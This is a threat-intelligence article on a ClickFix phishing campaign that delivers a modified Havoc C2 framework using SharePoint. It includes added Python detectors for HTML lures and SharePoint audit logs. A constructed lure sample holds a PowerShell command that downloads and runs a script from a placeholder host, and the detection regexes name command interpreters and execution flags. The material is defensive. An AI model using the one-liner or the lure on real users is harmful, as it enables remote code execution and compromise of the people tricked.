Fortinet researchers have uncovered a sophisticated phishing campaign in which threat actors use a multi-stage attack chain that combines social engineering with modified open-source tools to compromise Windows systems.
The campaign, active as of March 2025, employs the ClickFix technique to trick users into executing malicious code themselves, and it ultimately deploys a customized version of the Havoc command-and-control (C2) framework. The attack illustrates how current threats blend psychological manipulation with cloud service abuse to evade detection.
The attack begins with a phishing email masquerading as an urgent document notification. Attached to these emails is an HTML file named Documents.html, which displays a fabricated error message instructing users to copy and paste a PowerShell command into their terminal.
This ClickFix tactic preys on the victim’s willingness to resolve apparent technical issues, bypassing traditional file-based detection methods.
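The lure described above, as an added example that is not part of the original article: a small Python scanner for HTML attachments that flags the ClickFix combination of a clipboard write, a command-interpreter name, and download-and-execute hints, plus the "press Win+R" instruction that tells the victim where to paste. Both sample documents are constructed for this example (the lure is modelled on the description, not the real Documents.html, and its URL is a placeholder).

```python
import html
import re

# Constructed sample, modelled on the lure described in the article (this is not
# the real Documents.html): a fake error box and a script that copies a PowerShell
# one-liner to the clipboard when the victim clicks. The URL is a placeholder.
SAMPLE_LURE_HTML = """<html><body>
<div class="error">Document preview failed (error 0x80070005).
To fix it, press Win+R, paste the clipboard contents and press Enter.</div>
<button onclick="fix()">How to fix</button>
<script>
function fix() {
  const cmd = 'powershell -w hidden -ep bypass -c "iex (irm https://example.invalid/p.ps1)"';
  navigator.clipboard.writeText(cmd);
}
</script></body></html>"""

# Benign control: clipboard use without any command interpreter.
SAMPLE_BENIGN_HTML = """<html><body><p>Your ticket ID is 48213.</p>
<script>navigator.clipboard.writeText("48213");</script></body></html>"""

# Indicator groups. Each regex is deliberately broad; the verdict comes from the
# combination, not from any single match.
CLIPBOARD_RE = re.compile(r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]", re.I)
LOLBIN_RE = re.compile(r"\b(powershell|pwsh|mshta|rundll32|certutil|curl)\b", re.I)
EXEC_HINT_RE = re.compile(
    r"(\biex\b|invoke-expression|\birm\b|invoke-webrequest|downloadstring"
    r"|-enc(?:odedcommand)?\b|-ep\s+bypass|executionpolicy\s+bypass|-w(?:indowstyle)?\s+hidden)",
    re.I,
)
RUN_DIALOG_RE = re.compile(r"win\s*\+\s*r\b|run\s+dialog|windows\s*\+\s*r\b", re.I)


def scan_clickfix(html_text):
    """Score an HTML attachment for ClickFix indicators.

    'clickfix'   : clipboard write + a command interpreter + download/exec hints
    'suspicious' : at least two of the four indicator groups present
    'clean'      : otherwise
    """
    text = html.unescape(html_text)  # entities are a cheap way to hide 'powershell'
    lolbins = sorted({m.group(1).lower() for m in LOLBIN_RE.finditer(text)})
    exec_hints = sorted({m.group(1).lower() for m in EXEC_HINT_RE.finditer(text)})
    clipboard = CLIPBOARD_RE.search(text) is not None
    run_dialog = RUN_DIALOG_RE.search(text) is not None

    indicators = sum([clipboard, bool(lolbins), bool(exec_hints), run_dialog])
    if clipboard and lolbins and exec_hints:
        verdict = "clickfix"
    elif indicators >= 2:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {
        "verdict": verdict,
        "clipboard_write": clipboard,
        "lolbin": lolbins,
        "exec_hints": exec_hints,
        "run_dialog_instruction": run_dialog,
    }


if __name__ == "__main__":
    for name, sample in (("lure", SAMPLE_LURE_HTML), ("benign", SAMPLE_BENIGN_HTML)):
        print(name, scan_clickfix(sample))
```

The benign sample also writes to the clipboard, which is why a single indicator is not enough for a verdict; the scanner only calls a document ClickFix when the clipboard write, an interpreter name and execution hints appear together. Run it on the HTML part of a mail at the gateway or in a sandbox pre-filter; obfuscated lures that build the command from fragments will need a JavaScript-aware pass that this regex scanner does not attempt.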
The embedded PowerShell command retrieves a script from an attacker-controlled SharePoint URL. This script (payload_20250112_074319.ps1) performs anti-analysis checks, including counting the computers in the Active Directory domain to detect sandbox environments, which typically are not joined to a populated domain.
It then deletes existing registry entries under HKCU:\Software\Microsoft and marks the system with a unique infection identifier.
If the environment passes the sandbox checks, the script looks for pythonw.exe. If it is absent, the script downloads a Python interpreter, then executes a remote Python shellcode loader (payload_20250107_015913.py).
The loader, written partially in Russian, allocates memory, writes shellcode into it, and executes it to deploy the next stage: KaynLdr, a reflective shellcode loader taken from GitHub. KaynLdr uses API hashing and direct in-memory manipulation to load the malicious DLL without writing it to disk.
Havoc Demon DLL & SharePoint C2 Infrastructure
The final payload is a modified version of Havoc, an open-source post-exploitation framework akin to Cobalt Strike. Unlike standard Havoc implementations, this variant uses Microsoft Graph API endpoints to communicate with attacker-controlled SharePoint files, blending malicious traffic with legitimate cloud service requests.
The malware creates two files in SharePoint's default document library:
- {VictimID}pD9-tKout for sending encrypted data from the victim
- {VictimID}pD9-tKin for receiving commands.
During the CheckIn phase, the malware transmits system metadata (hostname, IP address, OS details, and privilege status), encrypted using AES-256-CTR with a randomly generated key.
"Commands are retrieved via SharePoint API calls, and responses are erased immediately after retrieval to minimize forensic footprints," the Fortinet report reads.
By embedding C2 logic within Microsoft Graph API interactions, attackers exploit the trust associated with SharePoint and Office 365 services.
The use of AES encryption and HTTPS traffic further complicates network-based detection. FortiGuard researchers note that the malware supports over 50 commands, including file exfiltration, lateral movement, and Kerberos ticket manipulation, mirroring capabilities in Havoc’s public repository.
Mitigations
Fortinet has issued signatures to block components across the attack chain:
- HTML/Agent.A5D4!tr for the initial phishing HTML
- PowerShell/MalwThreat!ebc5FT and Python/Agent.DF60!tr for the subsequent scripts
- W64/Havoc.L!tr for the Havoc payload.
The firm’s Content Disarm and Reconstruction (CDR) service neutralizes malicious macros, while the Backdoor.Havoc.Agent IPS signature targets C2 communications. Organizations are advised to:
- Train users to recognize social engineering lures involving terminal commands
- Monitor SharePoint for anomalous file creation patterns
- Restrict PowerShell execution in non-admin contexts (for example with Constrained Language Mode or application control policies).
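As an added example (not code from the article or from Fortinet's report), the following Python checks constructed Microsoft 365 audit records, shaped like Unified Audit Log SharePoint events, for two things: the reported {VictimID}pD9-tKout / {VictimID}pD9-tKin channel pair described earlier, and, going beyond the article, a generic write-then-delete churn heuristic that does not depend on that suffix. The tenant, account names, victim ID and timestamps are made up, and the assumption that "erased after retrieval" shows up as a delete event shortly after a write on the same name is mine.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed audit records, shaped like a subset of Microsoft 365 Unified Audit
# Log SharePoint events. Tenant, users, victim ID and times are made up; only the
# filename suffixes follow the pattern reported for the campaign.
SAMPLE_EVENTS = [
    {"CreationTime": "2025-03-04T09:12:01", "Operation": "FileUploaded", "UserId": "svc-docs@contoso.example", "SourceFileName": "A1B2C3D4pD9-tKout"},
    {"CreationTime": "2025-03-04T09:12:02", "Operation": "FileUploaded", "UserId": "svc-docs@contoso.example", "SourceFileName": "A1B2C3D4pD9-tKin"},
    {"CreationTime": "2025-03-04T09:12:45", "Operation": "FileDeleted",  "UserId": "svc-docs@contoso.example", "SourceFileName": "A1B2C3D4pD9-tKin"},
    {"CreationTime": "2025-03-04T09:13:10", "Operation": "FileUploaded", "UserId": "svc-docs@contoso.example", "SourceFileName": "A1B2C3D4pD9-tKin"},
    {"CreationTime": "2025-03-04T09:13:52", "Operation": "FileDeleted",  "UserId": "svc-docs@contoso.example", "SourceFileName": "A1B2C3D4pD9-tKin"},
    {"CreationTime": "2025-03-04T09:20:00", "Operation": "FileUploaded", "UserId": "alice@contoso.example", "SourceFileName": "Q1-budget.xlsx"},
    {"CreationTime": "2025-03-04T09:31:12", "Operation": "FileAccessed", "UserId": "alice@contoso.example", "SourceFileName": "Q1-budget.xlsx"},
    {"CreationTime": "2025-03-04T14:00:00", "Operation": "FileDeleted",  "UserId": "alice@contoso.example", "SourceFileName": "Q1-budget.xlsx"},
]

WRITE_OPS = {"FileUploaded", "FileModified"}
DELETE_OPS = {"FileDeleted", "FileRecycled"}

# Filenames reported for the campaign: <VictimID>pD9-tKout (victim -> operator)
# and <VictimID>pD9-tKin (operator -> victim).
C2_NAME_RE = re.compile(r"^(?P<victim>[A-Za-z0-9-]+)pD9-tK(?P<dir>in|out)$")


def campaign_channel_pairs(events):
    """Map VictimID -> sorted channel directions for names matching the reported
    pattern, keeping only victims for which both the in and out files exist."""
    seen = defaultdict(set)
    for ev in events:
        m = C2_NAME_RE.match(ev.get("SourceFileName", ""))
        if m:
            seen[m.group("victim")].add(m.group("dir"))
    return {v: sorted(d) for v, d in seen.items() if d == {"in", "out"}}


def find_churn(events, window_seconds=120, min_cycles=2):
    """Generic heuristic (an assumption about how 'erase after retrieval' surfaces
    in the audit log): the same account writes a file and deletes it within
    window_seconds, and does so at least min_cycles times. One hit per (user, file)."""
    per_key = defaultdict(list)
    for ev in events:
        per_key[(ev["UserId"], ev["SourceFileName"])].append(ev)

    hits = []
    for (user, name), evs in per_key.items():
        evs.sort(key=lambda e: e["CreationTime"])  # ISO-8601 strings sort chronologically
        last_write = None
        cycles = 0
        for ev in evs:
            t = datetime.fromisoformat(ev["CreationTime"])
            if ev["Operation"] in WRITE_OPS:
                last_write = t
            elif ev["Operation"] in DELETE_OPS and last_write is not None:
                if (t - last_write).total_seconds() <= window_seconds:
                    cycles += 1
                last_write = None
        if cycles >= min_cycles:
            hits.append({"user": user, "file": name, "cycles": cycles})
    return hits


def detect(events):
    """Run both checks and return a flat list of alert dicts."""
    alerts = []
    for victim, dirs in campaign_channel_pairs(events).items():
        alerts.append({"rule": "havoc-sharepoint-channel-pair", "victim_id": victim, "directions": dirs})
    for hit in find_churn(events):
        alerts.append({"rule": "sharepoint-write-delete-churn", **hit})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The filename rule is a brittle indicator: the suffix is trivially changed in a rebuilt Demon, so it is worth keeping only as a retrospective search. The churn rule is the one to keep running, tuned per tenant; the default document library of a site that sees the same account create and delete the same short-lived file every minute is behaving like a mailbox, not like a user, whatever the file is called. Feed it from the Office 365 Management Activity API or a SIEM export of SharePoint audit events.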
As open-source offensive frameworks like Havoc gain traction, continuous monitoring of API-driven cloud platforms becomes critical to identifying stealthy C2 channels.